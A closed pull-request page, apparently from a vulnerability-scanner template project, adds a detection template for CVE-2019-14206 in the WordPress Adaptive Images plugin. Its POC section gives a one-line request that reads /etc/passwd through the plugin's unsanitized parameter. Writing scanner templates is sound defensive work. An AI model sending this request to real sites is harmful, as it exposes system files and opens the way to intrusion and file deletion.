add template: CVE-2019-14206 WordPress Adaptive Images #14695
Closed
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Summary
Adds a template for CVE-2019-14206 in the Adaptive Images plugin (<0.6.67). The adaptive-images-script.php input is unsanitized, allowing arbitrary file read (LFI) and arbitrary file deletion via the cache path.
/claim #14693
POC
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd
Validation
nuclei -t bounties/CVE-2019-14206.yaml -u http://127.0.0.1:8080 -debugReferences